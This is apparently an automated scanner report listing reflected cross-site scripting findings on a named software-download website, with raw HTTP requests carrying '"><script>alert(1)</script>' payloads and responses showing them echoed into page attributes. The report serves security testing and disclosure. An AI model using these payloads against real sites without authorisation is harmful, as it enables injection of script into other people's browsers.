/downloads/t-64-bit-oovoo-download-jrletedp.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d51"><script>alert(1)</script>4f51ebb208e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-oovoo-download-jrletedp.html?e1d51"><script>alert(1)</script>4f51ebb208e=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:20:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60503
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-oovoo-download-jrletedp.html?e1d51"><script>alert(1)</script>4f51ebb208e=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37801"><script>alert(1)</script>ad83e3f4619 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads37801"><script>alert(1)</script>ad83e3f4619/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1 Host: www.x64bitdownload.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 14:59:17 GMT Server: Apache/2.2.9 (Fedora) Set-Cookie: downloadsite=td6rkej4n5bvmqp9ffd7osao76; expires=Sat, 23 Jul 2011 14:59:17 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads37801"><script>alert(1)</script>ad83e3f4619/t-64-bit-ozum-download-lhtivuds.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47648"><script>alert(1)</script>f734d0ee91b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-ozum-download-lhtivuds.html47648"><script>alert(1)</script>f734d0ee91b HTTP/1.1 Host: www.x64bitdownload.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html47648"><script>alert(1)</script>f734d0ee91b"/> ...[SNIP]...
1.263. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/downloads/t-64-bit-ozum-download-lhtivuds.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 850ca"><script>alert(1)</script>6fff343f0ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-ozum-download-lhtivuds.html?850ca"><script>alert(1)</script>6fff343f0ed=1 HTTP/1.1 Host: www.x64bitdownload.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3db1"><script>alert(1)</script>51fa849155c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadsa3db1"><script>alert(1)</script>51fa849155c/t-64-bit-ozum-download-lhtivuds.html/x22 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:18:39 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadsa3db1"><script>alert(1)</script>51fa849155c/t-64-bit-ozum-download-lhtivuds.html/x22" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d982"><script>alert(1)</script>b02d30346b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-ozum-download-lhtivuds.html1d982"><script>alert(1)</script>b02d30346b5/x22 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:19:36 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 57145
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html1d982"><script>alert(1)</script>b02d30346b5/x22"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 683a4"><script>alert(1)</script>5d118b29aed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22683a4"><script>alert(1)</script>5d118b29aed HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:20:12 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 57145
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html/x22683a4"><script>alert(1)</script>5d118b29aed"/> ...[SNIP]...
1.267. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 967ee"><script>alert(1)</script>71fe059bb0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22?967ee"><script>alert(1)</script>71fe059bb0c=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:17:12 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 57151
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html/x22?967ee"><script>alert(1)</script>71fe059bb0c=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3467"><script>alert(1)</script>d05bfef14e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadsa3467"><script>alert(1)</script>d05bfef14e/t-64-bit-paragon-extbrowser-download-xwigzbic.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:18:06 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadsa3467"><script>alert(1)</script>d05bfef14e/t-64-bit-paragon-extbrowser-download-xwigzbic.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b74d"><script>alert(1)</script>2f39237061 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html2b74d"><script>alert(1)</script>2f39237061 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:18:43 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html2b74d"><script>alert(1)</script>2f39237061"/> ...[SNIP]...
1.270. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a56"><script>alert(1)</script>621f1f0b522 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html?66a56"><script>alert(1)</script>621f1f0b522=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:16:18 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54640
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html?66a56"><script>alert(1)</script>621f1f0b522=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4614"><script>alert(1)</script>35e4d9d2a2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadsc4614"><script>alert(1)</script>35e4d9d2a2a/t-64-bit-pidgin-download-kkwthbed.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:21:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21323
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadsc4614"><script>alert(1)</script>35e4d9d2a2a/t-64-bit-pidgin-download-kkwthbed.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d72b"><script>alert(1)</script>775e881c02c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-pidgin-download-kkwthbed.html3d72b"><script>alert(1)</script>775e881c02c HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:22:37 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 57831
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-pidgin-download-kkwthbed.html3d72b"><script>alert(1)</script>775e881c02c"/> ...[SNIP]...
1.273. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/downloads/t-64-bit-pidgin-download-kkwthbed.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c708f"><script>alert(1)</script>5f593c9e2bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-pidgin-download-kkwthbed.html?c708f"><script>alert(1)</script>5f593c9e2bd=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:18:30 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 57837
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-pidgin-download-kkwthbed.html?c708f"><script>alert(1)</script>5f593c9e2bd=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b9e"><script>alert(1)</script>b57549acbe3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadsb3b9e"><script>alert(1)</script>b57549acbe3/t-64-bit-rss-reader-download-avwkinlm.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:19:08 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadsb3b9e"><script>alert(1)</script>b57549acbe3/t-64-bit-rss-reader-download-avwkinlm.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e04"><script>alert(1)</script>80ff2e869b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-rss-reader-download-avwkinlm.htmlc5e04"><script>alert(1)</script>80ff2e869b2 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:20:22 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54645
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-rss-reader-download-avwkinlm.htmlc5e04"><script>alert(1)</script>80ff2e869b2"/> ...[SNIP]...
1.276. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b65e"><script>alert(1)</script>1c166d61bb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-rss-reader-download-avwkinlm.html?5b65e"><script>alert(1)</script>1c166d61bb7=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:16:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54651
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-rss-reader-download-avwkinlm.html?5b65e"><script>alert(1)</script>1c166d61bb7=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18719"><script>alert(1)</script>ee7861559ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads18719"><script>alert(1)</script>ee7861559ed/t-64-bit-skype-download-szhzvwoz.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:21:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads18719"><script>alert(1)</script>ee7861559ed/t-64-bit-skype-download-szhzvwoz.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75f95"><script>alert(1)</script>c335ecb6c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-skype-download-szhzvwoz.html75f95"><script>alert(1)</script>c335ecb6c9b HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:22:30 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 57891
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-skype-download-szhzvwoz.html75f95"><script>alert(1)</script>c335ecb6c9b"/> ...[SNIP]...
1.279. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/downloads/t-64-bit-skype-download-szhzvwoz.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec64"><script>alert(1)</script>d5da7e23d0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-skype-download-szhzvwoz.html?1ec64"><script>alert(1)</script>d5da7e23d0e=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:18:17 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 57897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-skype-download-szhzvwoz.html?1ec64"><script>alert(1)</script>d5da7e23d0e=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39331"><script>alert(1)</script>831ea6de695 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads39331"><script>alert(1)</script>831ea6de695/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
